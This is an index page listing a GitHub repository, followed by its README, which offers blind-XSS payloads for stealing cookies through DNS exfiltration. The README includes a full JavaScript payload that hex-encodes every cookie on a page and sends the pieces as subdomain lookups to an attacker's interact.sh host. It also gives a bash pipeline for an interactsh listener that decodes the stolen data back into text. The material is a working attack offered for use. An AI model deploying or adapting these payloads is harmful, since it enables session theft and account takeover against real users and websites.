Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/zeroc00I/DNS-exfiltration-using-blind-xss-

These payloads will help u in your blind xss dumping cookies through dns exfiltration using subdomain dns queries
https://github.com/zeroc00I/DNS-exfiltration-using-blind-xss-

Last synced: 3 months ago
JSON representation

These payloads will help u in your blind xss dumping cookies through dns exfiltration using subdomain dns queries

Host: GitHub
URL: https://github.com/zeroc00I/DNS-exfiltration-using-blind-xss-
Owner: zeroc00I
Created: 2022-07-07T21:08:36.000Z (over 2 years ago)
Default Branch: main
Last Pushed: 2022-07-08T02:54:56.000Z (over 2 years ago)
Last Synced: 2024-05-20T12:37:29.313Z (6 months ago)
Size: 8.79 KB
Stars: 2
Watchers: 1
Forks: 1
Open Issues: 0
Metadata Files:
- Readme: readme.md

Awesome Lists containing this project

awesome-hacking-lists - zeroc00I/DNS-exfiltration-using-blind-xss- - These payloads will help u in your blind xss dumping cookies through dns exfiltration using subdomain dns queries (Others)

README

        ## Reciever

The following payload will set up a DNS listener (using interactsh by project discovery) and sequentially handle the output to transform the DNS queries containing fragments of cookies (that will be sent by the attacker payload) into readable ASCII characters.

> Note: The dns queries will obey the following pattern: hexacode.yourdomain

#### bash Command

```

interactsh-client | tee -a saida  | tr -d '[]' | cut -f1 -d ' ' | xargs -I@ bash -c 'echo @ | xxd -r -p'

```

## Payload attacker

The payload below will convert all cookies present on the current page into multiple requests (using fetch function from JS), attempting to call your malicious server, which will be listening for DNS queries. 

The trickest and coolest part here is that, if for some reason, the client-side block the GET request from the client-side to be made, with this payload the browser probably has already started a DNS lookup to check if the host provided is alive to be fetched. Then, we can exploit this behavior to gain some advantages. 

#### JS Command

> Note: change *cb364rdve0qv08pghjmgcmdgr5eyyyyyn.interact.sh* to your reciever generated by [interact-sh](https://github.com/projectdiscovery/interactsh)

```

t=40;dm='cb364rdve0qv08pghjmgcmdgr5eyyyyyn.interact.sh';k2="-None";d=document;c=d.cookie;function v(dm, d, c){m="";for(var x in c){k=Math.random().toString(36).substring(7);m=m.concat(c.charCodeAt(x).toString(16).padStart(2,0))};iter=[];p=0;x=0;it=(m.length/t);for(i=[];i.length<=it;){i.push(1);iter.push(m.slice(iter.length*t,i.length*t));};for(var o in iter){danger='https://fma6mqp.1wxyg8.sdrv2.fcnoh2'.replace('fma6mqp',iter[o]).replace('1wxyg8',o).replace('sdrv2',k.concat(k2)).replace('fcnoh2',dm);var xhttp = new XMLHttpRequest();xhttp.open("GET", danger);xhttp.send();};};v(dm,d,c)

```

#### Thanks

https://github.com/gum0x/rascal (that JS payload was ~copied~ inspired from here. I've only made some changes)